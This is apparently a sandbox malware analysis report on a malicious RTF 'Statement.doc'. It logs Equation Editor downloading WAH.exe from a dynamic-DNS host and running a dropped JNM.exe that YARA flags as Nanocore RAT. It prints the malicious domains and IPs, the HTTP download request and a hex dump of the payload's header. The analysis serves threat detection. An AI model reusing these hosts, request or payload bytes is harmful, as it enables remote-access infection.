            SHA-512:F4379DDE6A7A408FC07B534C97A0BA3786FBFB9C81E18BC8512FDC060A79EB6E28A239C68C83100497BFC620E3A3B9DA092BADB96C220C771BD496EF55FAF00E
            Malicious:false
            Preview: [doc]..Statement.LNK=0..Statement.LNK=0..[doc]..Statement.LNK=0..
            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.431160061181642
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
            Malicious:false
            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
            C:\Users\user\Desktop\~$atement.doc
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.431160061181642
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
            Malicious:false
            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

            Static File Info

            General

            File type:Rich Text Format data, unknown version
            Entropy (8bit):4.012906709970664
            TrID:
            • Rich Text Format (5005/1) 55.56%
            • Rich Text Format (4004/1) 44.44%
            File name:Statement.doc
            File size:111234
            MD5:854716b6ff05f02534960443c94340a1
            SHA1:6955e99f687a65747a95745b721c43543f3cf389
            SHA256:1421f7c867ff97c915fab1236fe5277b3116b426c0102f805fab25ef19fc681c
            SHA512:c05f6e67531bbefc6dd30bc13b3bee940ea63d1050d6ab26b8b2e8059e10f1714f1a2c2d4700d85ca863cfcd2b0b9665fc08121c9aada7ebb390bdf70bd5e89e
            SSDEEP:3072:/PQuOh2WX/aNt8lHvasJjjg6jYHh8Oj+JiII/:/PQ1dSNaUsJjpjYHwJq/
            File Content Preview:{\rtf2760{\object19672773\objhtml\objw7805\objh3271{\*\objdata753025{\*\qmspace645ansi645\*\pwd645 \*\qmspace645ansi645\*\.645} \...c6d4656e020000000b00000065{\*\objupdate}71554154494f4e2e3300000

            File Icon

            Icon Hash:e4eea2aaa4b4b4a4

            Static RTF Info

            Objects

            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
            000000040hno

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jan 27, 2021 19:12:26.374280930 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.450932980 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.451047897 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.451312065 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.534096956 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.534126043 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.534138918 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.534154892 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.534333944 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.611943007 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.611969948 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.611987114 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612005949 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612018108 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612051010 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612117052 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612133980 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612291098 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.612301111 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.689646959 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689673901 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689686060 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689732075 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689796925 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689814091 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689831018 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689848900 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689866066 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689882040 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689953089 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.689966917 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689982891 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689996004 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.690001011 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.690021038 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.690095901 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.691543102 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768106937 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768136024 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768147945 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768160105 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768177986 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768193960 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768209934 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768224955 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768282890 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768300056 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768311977 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768323898 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768347025 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768369913 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768414974 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768435955 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768440008 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768455982 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768474102 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768491030 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768503904 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768518925 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768521070 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768529892 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768549919 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768579960 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768613100 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768754959 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768789053 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768807888 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768825054 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768836975 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768852949 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768867970 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768889904 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.769238949 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845402002 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845433950 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845453978 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845472097 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845488071 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845501900 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845519066 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845531940 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845586061 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845696926 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845719099 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845736027 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845752001 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845768929 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845782995 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845793962 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845809937 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845817089 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845832109 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845851898 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845860958 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845880032 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845901966 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845906973 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845925093 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845940113 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845947981 CET4916580192.168.2.2284.38.135.158

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jan 27, 2021 19:12:26.185738087 CET5219753192.168.2.228.8.8.8
            Jan 27, 2021 19:12:26.243801117 CET53521978.8.8.8192.168.2.22
            Jan 27, 2021 19:12:26.253725052 CET5309953192.168.2.228.8.8.8
            Jan 27, 2021 19:12:26.316358089 CET53530998.8.8.8192.168.2.22
            Jan 27, 2021 19:12:26.316696882 CET5309953192.168.2.228.8.8.8
            Jan 27, 2021 19:12:26.373219967 CET53530998.8.8.8192.168.2.22
            Jan 27, 2021 19:12:36.786773920 CET5283853192.168.2.228.8.8.8
            Jan 27, 2021 19:12:36.870922089 CET53528388.8.8.8192.168.2.22
            Jan 27, 2021 19:12:36.871509075 CET5283853192.168.2.228.8.8.8
            Jan 27, 2021 19:12:36.934432983 CET53528388.8.8.8192.168.2.22
            Jan 27, 2021 19:12:54.519083023 CET6120053192.168.2.228.8.8.8
            Jan 27, 2021 19:12:54.575504065 CET53612008.8.8.8192.168.2.22
            Jan 27, 2021 19:12:54.575916052 CET6120053192.168.2.228.8.8.8
            Jan 27, 2021 19:12:54.623795986 CET53612008.8.8.8192.168.2.22
            Jan 27, 2021 19:13:14.112723112 CET4954853192.168.2.228.8.8.8
            Jan 27, 2021 19:13:14.169197083 CET53495488.8.8.8192.168.2.22
            Jan 27, 2021 19:13:31.679816961 CET5562753192.168.2.228.8.8.8
            Jan 27, 2021 19:13:31.736298084 CET53556278.8.8.8192.168.2.22
            Jan 27, 2021 19:13:31.737483978 CET5562753192.168.2.228.8.8.8
            Jan 27, 2021 19:13:31.793814898 CET53556278.8.8.8192.168.2.22
            Jan 27, 2021 19:13:31.794747114 CET5562753192.168.2.228.8.8.8
            Jan 27, 2021 19:13:31.852606058 CET53556278.8.8.8192.168.2.22
            Jan 27, 2021 19:13:49.371983051 CET5600953192.168.2.228.8.8.8
            Jan 27, 2021 19:13:49.430886030 CET53560098.8.8.8192.168.2.22
            Jan 27, 2021 19:13:49.431859016 CET5600953192.168.2.228.8.8.8
            Jan 27, 2021 19:13:49.490283012 CET53560098.8.8.8192.168.2.22
            Jan 27, 2021 19:14:06.224828959 CET6186553192.168.2.228.8.8.8
            Jan 27, 2021 19:14:06.283364058 CET53618658.8.8.8192.168.2.22
            Jan 27, 2021 19:14:23.264394999 CET5517153192.168.2.228.8.8.8
            Jan 27, 2021 19:14:23.315639973 CET53551718.8.8.8192.168.2.22
            Jan 27, 2021 19:14:23.316215038 CET5517153192.168.2.228.8.8.8
            Jan 27, 2021 19:14:23.377532959 CET53551718.8.8.8192.168.2.22

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Jan 27, 2021 19:12:26.185738087 CET192.168.2.228.8.8.80xc62bStandard query (0)manojvashanava234.sytes.netA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:26.253725052 CET192.168.2.228.8.8.80x2d4bStandard query (0)manojvashanava234.sytes.netA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:26.316696882 CET192.168.2.228.8.8.80x2d4bStandard query (0)manojvashanava234.sytes.netA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:36.786773920 CET192.168.2.228.8.8.80x8e4aStandard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:36.871509075 CET192.168.2.228.8.8.80x8e4aStandard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:54.519083023 CET192.168.2.228.8.8.80xd5c3Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:54.575916052 CET192.168.2.228.8.8.80xd5c3Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:13:14.112723112 CET192.168.2.228.8.8.80x62a5Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:13:31.679816961 CET192.168.2.228.8.8.80x80acStandard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:13:31.737483978 CET192.168.2.228.8.8.80x80acStandard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:13:31.794747114 CET192.168.2.228.8.8.80x80acStandard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:13:49.371983051 CET192.168.2.228.8.8.80x51f2Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:13:49.431859016 CET192.168.2.228.8.8.80x51f2Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:14:06.224828959 CET192.168.2.228.8.8.80x4aa4Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:14:23.264394999 CET192.168.2.228.8.8.80x70c0Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:14:23.316215038 CET192.168.2.228.8.8.80x70c0Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Jan 27, 2021 19:12:26.243801117 CET8.8.8.8192.168.2.220xc62bNo error (0)manojvashanava234.sytes.net84.38.135.158A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:26.316358089 CET8.8.8.8192.168.2.220x2d4bNo error (0)manojvashanava234.sytes.net84.38.135.158A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:26.373219967 CET8.8.8.8192.168.2.220x2d4bNo error (0)manojvashanava234.sytes.net84.38.135.158A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:36.870922089 CET8.8.8.8192.168.2.220x8e4aNo error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:36.934432983 CET8.8.8.8192.168.2.220x8e4aNo error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:54.575504065 CET8.8.8.8192.168.2.220xd5c3No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:54.623795986 CET8.8.8.8192.168.2.220xd5c3No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:14.169197083 CET8.8.8.8192.168.2.220x62a5No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:31.736298084 CET8.8.8.8192.168.2.220x80acNo error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:31.793814898 CET8.8.8.8192.168.2.220x80acNo error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:31.852606058 CET8.8.8.8192.168.2.220x80acNo error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:49.430886030 CET8.8.8.8192.168.2.220x51f2No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:49.490283012 CET8.8.8.8192.168.2.220x51f2No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:14:06.283364058 CET8.8.8.8192.168.2.220x4aa4No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:14:23.315639973 CET8.8.8.8192.168.2.220x70c0No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:14:23.377532959 CET8.8.8.8192.168.2.220x70c0No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)

            HTTP Request Dependency Graph

            • manojvashanava234.sytes.net

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.224916584.38.135.15880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            TimestampkBytes transferredDirectionData
            Jan 27, 2021 19:12:26.451312065 CET0OUTGET /WAH.exe HTTP/1.1
            Connection: Keep-Alive
            Host: manojvashanava234.sytes.net
            Jan 27, 2021 19:12:26.534096956 CET2INHTTP/1.1 200 OK
            Date: Wed, 27 Jan 2021 18:12:25 GMT
            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
            Last-Modified: Wed, 27 Jan 2021 18:12:25 GMT
            ETag: W/"1e1e00-5b9e73c7fac88"
            Accept-Ranges: bytes
            Content-Length: 1973760
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/x-msdownload
            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 e7 39 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 1e 00 00 02 00 00 00 00 00 00 5e 38 1e 00 00 20 00 00 00 40 1e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 38 1e 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 18 1e 00 00 20 00 00 00 1a 1e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1e 00 00 02 00 00 00 1c 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 38 1e 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 52 00 00 60 e5 1d 00 03 00 00 00 94 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1a 20 00 00 00 00 2a fa fe 09 01 00 39 30 00 00 00 28 95 01 00 06 39 18 00 00 00 fe 09 00 00 72 60 02 1d 70 fe 09 01 00 28 43 00 00 0a 28 44 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 45 00 00 0a 2a fe 09 00 00 2a 2a fe 09 00 00 28 5f 00 00 0a 2a 00 13 30 01 00 5f 08 00 00 00 00 00 00 28 93 01 00 06 28 92 01 00 06 28 91 01 00 06 28 90 01 00 06 28 8f 01 00 06 28 8e 01 00 06 28 8d 01 00 06 28 8c 01 00 06 28 8b 01 00 06 28 8a 01 00 06 28 89 01 00 06 fe 06 01 00 00 0a 80 87 01 00 04 28 88 01 00 06 28 87 01 00 06 28 86 01 00 06 fe 06 02 00 00 0a 80 86 01 00 04 28 85 01 00 06 28 84 01 00 06 28 83 01 00 06 fe 06 03 00 00 0a 80 85 01 00 04 28 82 01 00 06 28 81 01 00 06 28 80 01 00 06 28 7f 01 00 06 28 7e 01 00 06 28 7d 01 00 06 28 7c 01 00 06 28 7b 01 00 06 28 7a 01 00 06 28 79 01 00 06 28 78 01 00 06 28 77 01 00 06 28 76 01 00 06 28 75 01 00 06 28 74 01 00 06 28 73 01 00 06 28 72 01 00 06 28 71 01 00 06 28 70 01 00 06 28 6f 01 00 06 28 6e 01 00 06 fe 06 04 00 00 0a 80 84 01 00 04 28 6d 01 00 06 28 6c 01 00 06 28 6b 01 00 06 fe 06 05 00 00 0a 80 83 01 00 04 28 6a 01 00 06 28 69 01 00 06 28 68 01 00 06 fe 06 06 00 00 0a 80 82 01 00 04 28 67 01 00 06 28 66 01 00 06 28 65 01 00 06 fe 06 07 00 00 0a 80 81 01 00 04 28 64 01 00 06
            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL9`^8 @@ `@8K@ H.textd `.reloc@@B@8HR`* *90(9r`p(C(D*(E***(_*0_((((((((((((((((((((((~(}(|({(z(y(x(w(v(u(t(s(r(q(p(o(n(m(l(k(j(i(h(g(f(e(d


            Code Manipulations

            Statistics

            Behavior

            Click to jump to process

            System Behavior

            General

            Start time:19:12:38
            Start date:27/01/2021
            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
            Imagebase:0x13fdc0000
            File size:1424032 bytes
            MD5 hash:95C38D04597050285A18F66039EDB456
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:19:12:39
            Start date:27/01/2021
            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Wow64 process (32bit):true
            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Imagebase:0x400000
            File size:543304 bytes
            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:19:12:42
            Start date:27/01/2021
            Path:C:\Users\user\AppData\Roaming\JNM.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\JNM.exe
            Imagebase:0xce0000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 35%, ReversingLabs
            Reputation:low

            General

            Start time:19:12:44
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
            Imagebase:0x4abd0000
            File size:302592 bytes
            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:19:12:45
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\timeout.exe
            Wow64 process (32bit):true
            Commandline:timeout 1
            Imagebase:0xa20000
            File size:27136 bytes
            MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Start time:19:12:46
            Start date:27/01/2021
            Path:C:\Users\user\AppData\Roaming\JNM.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\JNM.exe
            Imagebase:0xce0000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, Author: Joe Security
